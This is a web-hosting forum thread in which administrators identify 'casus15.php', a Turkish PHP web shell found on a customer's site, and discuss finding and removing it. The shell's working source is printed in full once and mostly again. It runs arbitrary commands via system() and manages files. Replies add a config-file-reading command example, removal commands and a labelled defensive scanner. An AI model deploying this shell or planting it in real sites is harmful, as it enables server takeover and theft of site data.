  1. #1
    Join Date
    Sep 2004
    Posts
    55

    * casus15.php is it a trojan ???

    Just received an email from a customer that he found a trojan on his website called casus15.php

    I have never heard of such a trojan before, I believe that it is a wiki file!

    Can someone here help us please?

    Is it a trojan? and if so what is the safest way to find it and remove it?

    The customer sent to me the file, so I will have it if required.

    cheers

  2. #2
    Join Date
    Aug 2004
    Location
    USA
    Posts
    19
    If you mean a trojan to your server, I'd highly doubt a PHP script could be a backdoor trojan... or have the access! BUT! To be on the safe side, you should look at the source... see what it does. Then make your own judgement from it.

  3. #3
    Join Date
    Apr 2004
    Location
    Australia
    Posts
    419
    Check what it's looking up, also chmod it correctly (not 777)

  4. #4
    Join Date
    Aug 2004
    Location
    USA
    Posts
    19
    The chmod permission isn't the only permission it would need... for a trojan it would need some access, to suexec or something with power, and it would be in a socket maybe, just some quick assumptions.

  5. #5
    Join Date
    Sep 2004
    Posts
    55
    Well it looks pretty ugly!

    I think we will need a Turk expert here,

    I will paste it here and let the experts tell us what it does:

    <?php
    $default=$DOCUMENT_ROOT;
    $this_file="./casus15.php";



    if(isset($save)){
    $fname=str_replace(" ","_",$fname);
    $fname=str_replace("%20","_",$fname);
    header("Cache-control: private");
    header("Content-type: application/force-download");
    header("Content-Length: ".filesize($save));
    header("Content-Disposition: attachment; filename=$fname");

    $fp = fopen($save, 'r');
    fpassthru($fp);
    fclose($fp);
    unset($save);
    exit;
    }

    if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
    } else {
    $onoff = get_cfg_var('register_globals');
    }
    if ($onoff != 1) {
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
    }


    function deltree($deldir) {
    $mydir=@dir($deldir);
    while($file=$mydir->read()) {
    if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
    @chmod("$deldir/$file",0777);
    deltree("$deldir/$file");
    }
    if (is_file("$deldir/$file")) {
    @chmod("$deldir/$file",0777);
    @unlink("$deldir/$file");
    }
    }
    $mydir->close();
    @chmod("$deldir",0777);
    echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
    }

    if ($op=='phpinfo'){
    $fonk_kap = get_cfg_var("fonksiyonları_kapat");
    echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
    exit;
    }

    if ($op=='me'){
    echo "<html>
    <head>
    <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
    </head>
    <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
    <center>Fazla söze gerek yok...</center>
    <center><br>O yanlız bir kovboy,<br>
    <br>O cehennemden çıkan çılgın TÜRK,<br>
    <br>O bir rap manyağı,<br>
    <br>O bir php coder,<br>
    <br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
    <br>O...<br>
    <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
    <br></center>";

    $sayi='7';
    while($sayi>=1){
    echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
    $sayi--;
    }
    $sayi2='1';
    while($sayi2<=7){
    echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
    $sayi2++;
    };

    echo "</body>
    </html>";
    exit;
    }


    echo "<html>
    <head>
    <title>CasuS 1.5 by MafiABoY</title>
    </head>

    <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
    </body>";

    echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
    <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
    <br>";
    echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
    echo "<br>";
    echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
    echo "<br>";
    echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
    echo "<br>
    <br>
    <br>";
    echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";

    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<div align=center>
    <font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
    <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";

    if(!isset($dir)){
    $dir="$default";
    }
    echo "<input type=text size=60 name=dir value='$dir'>
    <input type=submit value='GIT'><br>
    </form>
    </div>";

    if ($op=='wshell'){
    echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
    if (isset($ok)){
    if (empty($kod)){
    die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>");
    }
    echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
    <br>";
    echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
    <br>
    <br></center></form>";
    echo "<center><TEXTAREA rows=30 cols=85 readonly>";
    system("$kod");
    echo "</TEXTAREA></center>";
    exit;

    } elseif (empty($ok)){
    echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
    <br>";
    echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
    <br>
    <br></center></form>";
    echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
    exit;
    }
    }

    if ($op=='up'){
    $path=dir;
    echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
    if(isset($dy)) {

    if(empty($dosya_gonder)){
    } else {
    copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder2)){
    } else {
    copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>ı<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder3)){
    } else {
    copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder4)){
    } else {
    copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    } elseif(empty($dy )) {
    $path=$dir;
    $dir = $dosya_dizin;
    echo "$dir";
    echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";

    echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
    echo "</form>";


    echo "</html>";
    }
    }


    if($op=='mf'){
    $path=$dir;
    if(isset($dismi) && isset($kodlar)){
    $ydosya="$path/$dismi";
    if(file_exists("$path/$dismi")){
    $dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
    } else {
    $dos = "Dosya Oluşturuldu";
    }
    touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
    $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
    fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
    fclose($ydosya2);
    echo "<center><font color='#0000FF'>$dos</font></center>";
    } else {

    echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
    echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
    echo "<br>";
    echo "<center>KODLAR</center><br>";
    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
    echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
    echo "</form>";
    }
    }

    if($op=='md'){
    $path=$dir;
    if(isset($kismi) && isset($okmf)){
    $klasör="$path/$kismi";
    mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
    echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
    }

    echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
    echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
    echo "<br>";
    echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
    echo "</form>";
    }


    if($op=='del'){
    unlink("$fname");
    }


    if($op=='dd'){
    $dir=$here;
    $deldirs=$yol;
    if(!file_exists("$deldirs")) {
    echo "<font color=\"#ff0000\">Dosya Yok</font>";
    } else {
    deltree($deldirs);
    }
    }



    if($op=='edit'){
    $yol=$fname;
    $yold=$path;
    if (isset($ok)){
    $dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
    $metin=$tarea;
    fwrite($dosya, $metin) or die("Yazılamıyor!");
    fclose($dosya);
    echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
    } else {
    $path=$dir;
    echo "<center>DÜZENLE: $yol</center>";
    $dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
    $boyut=filesize($yol);
    $duzen = @fread ($dosya, $boyut);
    echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
    echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
    echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
    fclose($dosya);
    $duzen=htmlspecialchars($duzen);
    echo "</form>";
    }
    }

    if($op=='efp2'){
    $fileperm=base_convert($_POST['fileperm'],8,10);
    echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
    echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
    }

    if($op=='efp'){
    $izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
    echo "<form method=post action=./$this_file?op=efp2>
    <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
    <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
    <input name='dir' type='hidden' value='$yol'>
    <input type='submit' value='TAMAM' class='input'></div><br>
    </form>";

    }


    $path=$dir;
    if(isset($dir)){
    if ($dir = @opendir("$dir")) {
    while (($file = readdir($dir)) !== false) {
    if($file!="." && $file!=".."){
    if(is_file("$path/$file")){
    $disk_space=filesize("$path/$file");
    $kb=$disk_space/1024;
    $total_kb = number_format($kb, 2, '.', '');
    $total_kb2="Kb";


    echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
    echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
    @$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
    echo "<br></div>\n";
    }else{
    echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
    $dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo "<font color='#FFFF00'>$dirperm</font>";
    echo " <br></div>\n";

    }
    }
    }
    closedir($dir);
    }
    }




    echo "<center>------------------------------</center>";
    echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
    echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
    if(file_exists("B:\\")){
    echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
    } else {}
    if(file_exists("C:\\")){
    echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
    } else {}
    if (file_exists("D:\\")){
    echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
    } else {}
    if (file_exists("E:\\")){
    echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
    } else {}
    if (file_exists("F:\\")){
    echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
    } else {}
    if (file_exists("G:\\")){
    echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
    } else {}
    if (file_exists("H:\\")){
    echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
    } else {}


    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
    echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
    echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
    echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
    echo "<br>";
    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<br>
    <center>Tüm hakları sahibi MafiABoY'a aittir</center>";
    ?>

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    It's not a trojan. It's a script that was created to execute system commands on your server using the system() function. This is not a good thing, the attacker could do

    system("cat /home/user/public_html/config.php");

    for example, if your server is not properly secured.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Sep 2004
    Posts
    55
    Originally posted by thelinuxguy
    It's not a trojan. It's a script that was created to execute system commands on your server using the system() function. This is not a good thing, the attacker could do

    system("cat /home/user/public_html/config.php");

    for example, if your server is not properly secured.
    Thank you very much, that is what I suspected.

    This script was found by one of my customers on his websites.

    What can I do to locate any other copies and destroy them and what is the safest way??

    Thank you very much in advance.

  8. #8
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Guessing you have Linux/FreeBSD, just rm -f the files. They are just PHP files.

  9. #9
    Join Date
    Jan 2004
    Location
    /home/dislexik
    Posts
    823
    Try this command:

    find /home -name casus15.php -print0 | xargs -0 rm -rf

    That will search /home for all files by the name of casus15.php and pass it through rm -rf (Removes it)

    DislexiK
    "You don’t learn to hack, you hack to learn"

  10. #10
    Join Date
    Mar 2004
    Location
    Los Angeles
    Posts
    622
    Some words translated into English in this file:

    Lords of the Hackers
    Server Information
    Go to Root Folder
    Change the permissions of the file
    etc.

    Goes like this.

  11. #11
    Join Date
    Sep 2004
    Location
    Flint, Michigan
    Posts
    5,766
    What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?

  12. #12
    Join Date
    Jan 2004
    Location
    /home/dislexik
    Posts
    823
    justadollarhostin,

    The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP

    DislexiK

  13. #13
    Join Date
    Sep 2004
    Location
    Flint, Michigan
    Posts
    5,766
    Originally posted by DislexiK
    justadollarhostin,

    The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP

    DislexiK
    That was my guess too

    But having read the source of the PHP file, I was curious as to the language used in it:

    <center><br>O yanlız bir kovboy,<br>
    <br>O cehennemden çıkan çılgın TÜRK,<br>
    <br>O bir rap manyağı,<br>
    <br>O bir php coder,<br>
    <br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
    <br>O...<br>
    <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>

  14. #14
    Join Date
    Jul 2003
    Location
    Kuwait
    Posts
    5,104
    If you have safemode and proper permissions on your servers, this script can't do much -- other than take up space....which rm can fix.

    An easy way to find out if this script exists on your server -- take an md5 hash of it, then write a script that can compare the md5 hashes of other php files and compare it. If the hash matches, the file is there (even if it has a different name).

    Would take a lot of server crunch time -- but if you have a spare box, you could wget the files and then have the check running on the spare box.

    If you just check for the filename, then if the same code exists with a different filename, the vulnerability will still be there.
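
    Added example (not part of the original thread, and not code from any poster): one way to do the content-based search described in post #14. It generalizes the post in two ways: it uses SHA-256 where the post mentions md5, and besides byte-identical copies it also flags PHP files that contain strings from the source posted in #5, so a lightly edited copy is reported too. The function names, the marker list and the command-line arguments are assumptions of this example.

```python
#!/usr/bin/env python3
"""Find copies of a known-bad PHP file by content instead of by file name."""
import hashlib
import os
import sys

# Strings that appear in the casus15.php source posted in this thread.
# A file containing any of them is reported even when its hash differs,
# which catches copies that were edited after upload. (Example assumption:
# these two markers are enough; extend the tuple for other samples.)
MARKERS = (b"CasuS 1.5", b"MafiABoY")

MAX_MARKER_READ = 1024 * 1024  # only inspect the first 1 MiB for markers


def file_digest(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large files stay out of memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan(root, sample_path, suffixes=(".php",), markers=MARKERS):
    """Walk root and return a sorted list of (path, reason) tuples.

    reason is "hash" for a byte-identical copy of the sample (any name)
    and "marker" for a file that contains one of the marker strings.
    """
    bad_digest = file_digest(sample_path)
    bad_size = os.path.getsize(sample_path)
    sample_real = os.path.realpath(sample_path)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(tuple(suffixes)):
                continue
            path = os.path.join(dirpath, name)
            # Skip symlinks and the reference sample itself.
            if os.path.islink(path) or os.path.realpath(path) == sample_real:
                continue
            try:
                # Comparing sizes first avoids hashing most files.
                if (os.path.getsize(path) == bad_size
                        and file_digest(path) == bad_digest):
                    hits.append((path, "hash"))
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(MAX_MARKER_READ)
                if any(m in head for m in markers):
                    hits.append((path, "marker"))
            except OSError:
                # Unreadable file: leave it for a run with more privileges.
                continue
    return sorted(hits)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: scan.py <root-dir> <known-bad-sample>")
    for hit_path, why in scan(sys.argv[1], sys.argv[2]):
        print(f"{why}\t{hit_path}")
```

    The script only reports; review each hit and check web server logs for requests to it before removing anything, since the file's presence means something on the site allowed the upload.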

  15. #15
    Join Date
    Jul 2004
    Location
    Texas
    Posts
    688
    Originally posted by justadollarhostin
    What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?
    If you search 'CaSuS 1.5 by Mafiaboy' on Google and click cached pages, it seems that it is a Turk hacker. Maybe he finds exploits in stuff? Some things are in 'uploads' directories.

  16. #16
    Join Date
    Apr 2004
    Location
    Phx, AZ, USA
    Posts
    12
    I know this is an old post, but we just found one of these files on our Windows 2003 Server. We are using a Unique IUSR for each domain, but considering it works at system level, that would be nothing.

    Any way to block this from working?

    PHP Code:
    <?php
    $default
    =$DOCUMENT_ROOT;
    $this_file=\"./casus15.php\";



    if(isset(
    $save)){
    $fname=str_replace(\" \",\"_\",$fname);
    $fname=str_replace(\"%20\",\"_\",$fname);
    header(\"Cache-control: private\");
    header(\"Content-type: application/force-download\");
    header(\"Content-Length: \".filesize(
    $save));
    header(\"Content-Disposition: attachment; filename=
    $fname\");

    $fp = fopen($save, \'r\');
    fpassthru(
    $fp);
    fclose(
    $fp);
    unset(
    $save);
    exit;
    }

    if ( function_exists(\'ini_get\') ) {
            
    $onoff = ini_get(\'register_globals\');
    } else {
            
    $onoff = get_cfg_var(\'register_globals\');
    }
    if (
    $onoff != 1) {
            @extract(
    $_POST, EXTR_SKIP);
            @extract(
    $_GET, EXTR_SKIP);
    }


    function deltree(
    $deldir) {
            
    $mydir=@dir($deldir);
            while(
    $file=$mydir->read())        {
                    if((is_dir(\"
    $deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\")) {
                            @chmod(\"
    $deldir/$file\",0777);
                            deltree(\"
    $deldir/$file\");
                    }
                    if (is_file(\"
    $deldir/$file\")) {
                            @chmod(\"
    $deldir/$file\",0777);
                            @unlink(\"
    $deldir/$file\");
                    }
            }
            
    $mydir->close();
            @chmod(\"
    $deldir\",0777);
            echo @rmdir(
    $deldir) ? \"<center><b><font color=\'#0000FF\'>SİLİNDİ:$deldir/$file</b></font></center>\" : \"<center><font color=\\\"#ff0000\\\">Silinemedi:$deldir/$file</font></center>\";
            }

    if (
    $op==\'phpinfo\'){
    $fonk_kap = get_cfg_var(\"fonksiyonları_kapat\");
            echo 
    $phpinfo=(!eregi(\"phpinfo\",$fonk_kapat)) ? phpinfo() : \"<center>phpinfo() Komutu Çalışmıyiii</center>\";
            exit;
    }

    if (
    $op==\'me\'){
    echo \"<html>
          <head>
                <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
          </head>
          <body bgcolor=\'#000000\' text=\'#0000FF\' link=\'#0000FF\' vlink=\'#0000FF\' alink=\'#00FF00\'>
          <center>Fazla söze gerek yok...</center>
          <center><br>O yanlız bir kovboy,<br>
          <br>O cehennemden çıkan çılgın TÜRK,<br>
          <br>O bir rap manyağı,<br>
          <br>O bir php coder,<br>
          <br>O\'nun hackten daha çok sevdiği tek şey iki hack,<br>
          <br>O...<br>
          <br>O\'nun kim olduunu biliyorsunuz O tabiki...<br>
          <br></center>\";

    $sayi=\'7\';
    while(
    $sayi>=1){
    echo \"<center><font size=\'
    $sayi\' color=\'#FFFFFF\'>HACKLERIN<font color=\'#008000\'> EFENDISI</font> <font color=\'#FF0000\'>MAFIABOY</font> </font></center>\";
    $sayi--;
    }
    $sayi2=\'1\';
    while(
    $sayi2<=7){
    echo \"<center><font size=\'
    $sayi2\' color=\'#008000\'>baddog@hotmail.com</font></center>\";
    $sayi2++;
    };

    echo \"</body>
          </html>\";
    exit;
    }


    echo \"<html>
          <head>
                 <title>CasuS 1.5 by MafiABoY</title>
          </head>

           <body bgcolor=\'#000000\' text=\'#008000\' link=\'#00FF00\' vlink=\'#00FF00\' alink=\'#00FF00\'>
           </body>\";

    echo \"<center><font size=\'+3\' color=\'#FF0000\'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
          <center><font size=\'+2\' color=\'#FFFFFF\'>A TURKISH </font><font size=\'+2\' color=\'#FF0000\'>HACKER</font><br>
          <br>\";
    echo \"<center><a href=\'./
    $this_file?dir=$dir\'>ANA BOLUM</a></center>\";
    echo \"<br>\";
    echo \"<center><a href=\'./
    $this_file?op=phpinfo\' target=\'_blank\'>PHP INFO</a></center>\";
    echo \"<br>\";
    echo \"<center><a href=\'./
    $this_file?op=wshell&dir=$dir\'>WEB SHELL</a></center>\";
    echo \"<br>
          <br>
          <br>\";
    echo \"<center>---><a href=\'./
    $this_file?op=me\' target=\'_blank\'>MafiABoY</a><---</center>\";

    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<div align=center>
          <font size=\'+1\' color=\'#0000FF\'><u>Root Klasör</u>: 
    $DOCUMENT_ROOT</font><br>
          <font size=\'+1\'color=\'#0000FF\'><u>CasuS 1.5\'in URL\'si</u>: [url]http://[/url]
    $HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>\";

    if(!isset(
    $dir)){
    $dir=\"$default\";
    }
    echo \"<input type=text size=60 name=dir value=\'
    $dir\'>
    <input type=submit value=\'GIT\'><br>
    </form>
    </div>\";

    if (
    $op==\'wshell\'){
    echo \"<br><center><font size=\'+1\' color=\'#FF0000\'>WEBSHELL</font></center>\";
    if (isset(
    $ok)){
    if (empty(
    $kod)){
    die (\"<center><font color=\'#FF0000\'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>\");
    }
    echo \"<form method=\'Post\' action=\'./
    $this_file?op=wshell&dir=$dir\'>
          <br>\";
    echo \"<center><input type=text size=35 name=kod value=\'
    $kod\'><input type=submit name=ok value=\'CALISTIR\'>
          <br>
          <br></center></form>\";
    echo \"<center><TEXTAREA rows=30 cols=85 readonly>\";
    system(\"
    $kod\");
    echo \"</TEXTAREA></center>\";
    exit;

    } elseif (empty(
    $ok)){
    echo \"<form method=\'Post\' action=\'./
    $this_file?op=wshell&dir=$dir\'>
          <br>\";
    echo \"<center><input type=text size=35 name=kod value=\'Calistirmak istediginiz komutu buraya girin\'><input type=submit name=ok value=\'CALISTIR\'>
          <br>
          <br></center></form>\";
    echo \"<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>\";
    exit;
    }
    }

    if (
    $op==\'up\'){
            
    $path=dir;
            echo \"<br><br><center><font size=\'+1\' color=\'#FF0000\'><b>DOSYA GONDERME</b></font></center><br>\";
    if(isset(
    $dy)) {

    if(empty(
    $dosya_gonder)){
    } else {
    copy ( 
    $dosya_gonder, \"$dir/$dosya_gonder_name\") ? print(\"$dosya_gonder_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder2)){
    } else {
    copy ( 
    $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_name <font color=\'#0000FF\'>kopyaland</font>ı<br>\") : print(\"$dosya_gonder2_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder3)){
    } else {
    copy ( 
    $dosya_gonder3, \"$dir/$dosya_gonder3_name\") ? print(\"$dosya_gonder3_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder3_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder4)){
    } else {
    copy ( 
    $dosya_gonder4, \"$dir/$dosya_gonder4_name\") ? print(\"$dosya_gonder4_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder4_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    } elseif(empty(
    $dy )) {
    $path=$dir;
    $dir = $dosya_dizin;
    echo \"
    $dir\";
    echo \"<FORM  ENCTYPE=\'multipart/form-data\' ACTION=\'
    $this_file?op=up&dir=$path\' METHOD=\'POST\'>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder2\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder3\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder4\'></center><br>\";

    echo \"<br><center><INPUT TYPE=\'SUBMIT\' NAME=\'dy\' VALUE=\'Dosya Yolla!\'></center>\";
    echo \"</form>\";


    echo \"</html>\";
    }
    }


    if(
    $op==\'mf\'){
        
    $path=$dir;
        if(isset(
    $dismi) && isset($kodlar)){
                    
    $ydosya=\"$path/$dismi\";
                    if(file_exists(\"
    $path/$dismi\")){
                            
    $dos= \"Böyle Bir Dosya Vardı Üzerine Yazıldı\";
                    } else {
                            
    $dos = \"Dosya Oluşturuldu\";
                    }
                    touch (\"
    $path/$dismi\") or die(\"Dosya Oluşturulamıyor\");
                    
    $ydosya2 = fopen(\"$ydosya\", \'w\') or die(\"Dosya yazmak için açılamıyor\");
                    fwrite(
    $ydosya2$kodlar) or die(\"Dosyaya yazılamıyor\");
                    fclose(
    $ydosya2);
                    echo \"<center><font color=\'#0000FF\'>
    $dos</font></center>\";
            } else {

            echo \"<FORM METHOD=\'POST\' ACTION=\'
    $this_file?op=mf&dir=$path\'>\";
            echo \"<center>Dosya İsmi :<input type=\'text\' name=\'dismi\'></center><br>\";
        echo \"<br>\";
        echo \"<center>KODLAR</center><br>\";
        echo \"<center><TEXTAREA NAME=\'kodlar\' ROWS=\'19\' COLS=\'52\'></TEXTAREA></center>\";
            echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
        echo \"</form>\";
            }
    }

    if(
    $op==\'md\'){
            
    $path=$dir;
            if(isset(
    $kismi) && isset($okmf)){
                    
    $klasör=\"$path/$kismi\";
                    mkdir(\"
    $klasör\", 0777) or die (\"<center><font color=\'#0000FF\'>Klasör Oluşturulamıyor</font></center>\");
                    echo \"<center><font color=\'#0000FF\'>Klasör Oluşturuldu</font></center>\";
            }

            echo \"<FORM METHOD=\'POST\' ACTION=\'
    $this_file?op=md&dir=$path\'>\";
